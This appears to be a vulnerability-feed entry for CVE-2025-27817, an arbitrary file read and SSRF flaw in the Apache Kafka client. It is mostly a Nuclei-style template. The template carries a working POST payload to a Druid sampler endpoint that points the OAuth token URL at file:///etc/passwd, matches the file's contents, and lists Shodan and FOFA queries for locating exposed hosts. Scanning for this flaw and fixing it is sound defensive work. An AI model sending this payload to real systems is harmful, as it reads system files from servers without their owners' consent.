Apache Kafka Client contains arbitrary file read and server-side request forgery caused by untrusted configuration of sasl.oauthbearer.token.endpoint.url and sasl.oauthbearer.jwks.endpoint.url, letting attackers read files or send requests to unintended locations, exploit requires untrusted party to specify client configurations.
PoC代码[已公开]
id: CVE-2025-27817
info:
name: Apache Kafka Client - Arbitrary File Read
author: 0x_Akoko
severity: high
description: |
Apache Kafka Client contains arbitrary file read and server-side request forgery caused by untrusted configuration of sasl.oauthbearer.token.endpoint.url and sasl.oauthbearer.jwks.endpoint.url, letting attackers read files or send requests to unintended locations, exploit requires untrusted party to specify client configurations.
impact: |
Attackers can read arbitrary files or make unintended network requests, potentially exposing sensitive data or causing unauthorized interactions.
remediation: |
Update to Apache Kafka 4.0.0 or later and configure allowed URLs using -Dorg.apache.kafka.sasl.oauthbearer.allowed.urls system property.
reference:
- https://github.com/kk12-30/CVE-2025-27817
- https://nvd.nist.gov/vuln/detail/CVE-2025-27817
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2025-27817
cwe-id: CWE-918
metadata:
max-request: 1
verified: true
shodan-query: http.title:"Apache kafka"
fofa-query: title="Apache Kafka"
tags: cve,cve2025,apache,lfi,file-read,ssrf,kafka,oss
http:
- raw:
- |
POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"type":"kafka","spec":{"type":"kafka","ioConfig":{"type":"kafka","consumerProperties":{"bootstrap.servers":"127.0.0.1:6666","sasl.mechanism":"OAUTHBEARER","security.protocol":"SASL_SSL","sasl.login.callback.handler.class":"org.apache.kafka.common.security.oauthbearer.secured.OAuthBearerLoginCallbackHandler","sasl.oauthbearer.token.endpoint.url":"file:///etc/passwd","sasl.jaas.config":"org.apache.kafka.common.security.oauthbearer.OAuthBearerLoginModule required sasl.oauthbearer.token.endpoint.url=\"http://127.0.0.1:9999/token\" sasl.oauthbearer.jwks.endpoint.url=\"http://127.0.0.1:9999/jwks\" sasl.oauthbearer.client.id=your-client-id sasl.oauthbearer.client.secret=your-client-secret sasl.oauthbearer.expected.audience=kafka sasl.oauthbearer.expected.issuer=\"http://127.0.0.1:9999\" useFirstPass=true serviceName=kafka debug=true;"},"topic":"test","useEarliestOffset":true,"inputFormat":{"type":"regex","pattern":"([\\s\\S]*)","listDelimiter":"","columns":["raw"]}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":"1970-01-01T00:00:00Z"},"dimensionsSpec":{},"granularitySpec":{"rollup":false}},"tuningConfig":{"type":"kafka"}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Malformed JWT provided"
- "RecordSupplier"
condition: and
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 400
# digest: 490a00463044022049f0d70ef8adf7e5e7d078a88f6f2d1244ea1fb4a443c1e1288ddf950bbcb7740220033165806c01875c79e73000dedc4d37282308bcb894e527d14c7fa407781807:922c64590222798bb761d5b6d8e72950